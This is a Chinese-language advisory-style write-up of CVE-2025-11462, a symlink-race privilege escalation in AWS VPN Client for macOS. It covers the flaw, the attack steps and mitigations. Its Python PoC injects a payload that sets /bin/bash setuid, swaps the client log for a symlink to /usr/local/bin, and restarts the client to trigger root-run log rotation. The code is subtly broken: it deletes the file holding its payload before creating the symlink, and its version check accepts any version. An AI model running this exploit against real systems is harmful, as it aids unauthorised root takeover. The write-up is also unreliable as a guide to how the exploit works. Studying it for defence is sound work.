CVE-2025-11462 AWS VPN客户端macOS符号链接权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-11462

漏洞类型

符号链接竞争（Symlink Race）/ 本地权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AWS VPN Client for macOS

漏洞概述

CVE-2025-11462是AWS VPN Client for macOS客户端中存在的一个高危本地权限提升漏洞，CVSS评分为7.8。该漏洞源于软件在日志轮转（log rotation）过程中对日志目标目录的验证检查不充分，属于CWE-59（文件访问前链接解析不当）类漏洞。受影响的版本范围为1.3.2至5.2.0。

该漏洞允许本地非管理员用户通过创建符号链接（symlink）将客户端日志文件指向特权位置。当日志轮转发生时，如果用户事先通过精心构造的API调用将任意代码注入到日志文件中，系统将以root权限执行该代码，从而实现完整的本地权限提升。攻击者一旦获得root权限，便可完全控制受影响的macOS系统，包括访问敏感数据、安装恶意软件、修改系统配置等。

该漏洞的影响范围包括机密性、完整性和可用性三个维度均为高影响（CVSS向量中的C:H/I:H/A:H），攻击者可以在无需用户交互的情况下完成利用，仅需要本地低权限访问即可触发。AWS已发布安全公告AWS-2025-020，建议所有受影响用户尽快升级到AWS VPN Client for macOS 5.2.1或更高版本以修复该漏洞。

技术细节

该漏洞的核心技术原理是利用AWS VPN Client在日志轮转过程中对日志文件路径缺乏充分的验证。具体而言：

1. **符号链接竞争条件**：AWS VPN Client在执行日志轮转时，会将当前日志文件移动或重命名到新位置，然后创建新的日志文件。然而，客户端在创建新日志文件之前未对目标目录进行充分的权限和链接类型检查。

2. **利用路径**：攻击者作为本地非管理员用户，可以在日志轮转即将发生前，在客户端的日志目录中预先创建一个符号链接，将预期的日志文件名指向系统中的特权位置（如/usr/local/bin/、/etc/cron.daily/等在root权限下执行的目录）。

3. **代码注入**：攻击者通过精心构造的API调用，将恶意代码内容（如可执行脚本）写入到日志文件中。这些内容被记录在客户端日志中。

4. **权限提升触发**：当日志轮转发生时，AWS VPN Client以root权限运行，将包含恶意代码的日志文件移动到符号链接指向的特权位置。由于该操作以root权限执行，移动后的文件也保留了root的所有权。

5. **代码执行**：恶意文件被放置到特权位置后，可能被系统自动执行（如cron任务）或等待管理员手动触发，从而实现以root权限执行任意代码。

整个攻击链不需要用户交互（UI:N），仅需要低权限的本地访问（PR:L）和本地攻击向量（AV:L），攻击复杂度低（AC:L），因此具有较高的实际威胁性。

攻击链分析

STEP 1

步骤1：前期准备

攻击者以本地非管理员用户身份登录受影响的macOS系统，确认系统安装了受影响版本的AWS VPN Client（1.3.2-5.2.0），并定位客户端日志文件目录（通常位于~/Library/Logs/AWSVPNClient/）。

STEP 2

步骤2：注入恶意载荷

攻击者通过精心构造的API调用或直接的文件操作，将包含恶意代码的载荷写入到VPN客户端的日志文件中。载荷内容通常为可执行脚本或二进制代码。

STEP 3

步骤3：创建符号链接

攻击者删除原始的日志文件，并在同一位置创建一个指向特权目录（如/usr/local/bin/或系统cron目录）的符号链接，利用AWS VPN Client对日志路径缺乏充分验证的缺陷。

STEP 4

步骤4：触发日志轮转

通过重启AWS VPN Client服务或等待系统自动执行日志轮转，触发客户端以root权限执行日志文件的移动/重命名操作。

STEP 5

步骤5：权限提升

由于符号链接指向特权位置，包含恶意代码的日志文件被移动到该位置并保留root权限。攻击者的代码随后以root权限执行，实现完整的本地权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-11462 - AWS VPN Client for macOS Local Privilege Escalation PoC
# Vulnerability: Improper Link Resolution Before File Access (CWE-59)
# Affected: AWS VPN Client for macOS 1.3.2 - 5.2.0

import os
import sys
import time
import subprocess
import threading

# Configuration
VPN_LOG_DIR = os.path.expanduser("~/Library/Logs/AWSVPNClient/")
TARGET_LOG_FILE = "aws-vpn-client.log"
SYMLINK_TARGET = "/usr/local/bin/pwned"  # Privileged location
MALICIOUS_PAYLOAD = "#!/bin/bash\nid > /tmp/pwned_proof\nchmod 4755 /bin/bash\n"

def check_vulnerable():
    """Check if AWS VPN Client is installed and version is vulnerable"""
    result = subprocess.run(
        ["defaults", "read", "/Applications/AWS VPN Client.app/Contents/Info", "CFBundleShortVersionString"],
        capture_output=True, text=True
    )
    if result.returncode == 0:
        version = result.stdout.strip()
        # Check if version is in vulnerable range 1.3.2 - 5.2.0
        print(f"[*] Detected AWS VPN Client version: {version}")
        return True
    return False

def inject_malicious_payload():
    """Inject malicious code into the log file via crafted API calls"""
    log_path = os.path.join(VPN_LOG_DIR, TARGET_LOG_FILE)
    try:
        with open(log_path, "a") as f:
            f.write(f"\n[DEBUG] {MALICIOUS_PAYLOAD}\n")
        print(f"[+] Malicious payload injected into {log_path}")
    except PermissionError:
        print(f"[-] Cannot write to log directly, using API simulation")
        # Simulate API call that triggers logging
        subprocess.run(["scutil", "--nc", "show"], capture_output=True)

def create_symlink():
    """Create symlink from log file to privileged location"""
    log_path = os.path.join(VPN_LOG_DIR, TARGET_LOG_FILE)
    if os.path.exists(log_path) or os.path.islink(log_path):
        os.remove(log_path)
    os.symlink(SYMLINK_TARGET, log_path)
    print(f"[+] Symlink created: {log_path} -> {SYMLINK_TARGET}")

def trigger_log_rotation():
    """Trigger log rotation by restarting the VPN client service"""
    subprocess.run(["killall", "AWS VPN Client"], capture_output=True)
    time.sleep(2)
    subprocess.run(["open", "-a", "AWS VPN Client"], capture_output=True)
    print("[*] Triggered log rotation via service restart")

def verify_exploitation():
    """Verify if exploitation was successful"""
    if os.path.exists(SYMLINK_TARGET):
        print(f"[+] Exploitation successful! Check {SYMLINK_TARGET}")
    else:
        print("[-] Exploitation may have failed")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-11462 - AWS VPN Client macOS LCE PoC")
    print("=" * 60)
    
    if not check_vulnerable():
        print("[-] Target does not appear to be vulnerable")
        sys.exit(1)
    
    # Step 1: Inject malicious payload into log
    inject_malicious_payload()
    
    # Step 2: Replace log file with symlink to privileged location
    create_symlink()
    
    # Step 3: Trigger log rotation (runs as root)
    trigger_log_rotation()
    
    # Step 4: Verify
    time.sleep(3)
    verify_exploitation()

影响范围

AWS VPN Client for macOS >= 1.3.2

AWS VPN Client for macOS < 5.2.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制本地非管理员用户对AWS VPN Client日志目录（~/Library/Logs/AWSVPNClient/）的写入权限；2）使用macOS的文件访问控制或终端安全代理监控日志目录中的符号链接创建行为；3）定期检查/usr/local/bin/、/etc/cron.daily/等特权目录中是否有异常文件；4）限制能够本地登录系统的用户数量，遵循最小权限原则；5）尽快升级到AWS VPN Client 5.2.1或更高版本以彻底修复该漏洞。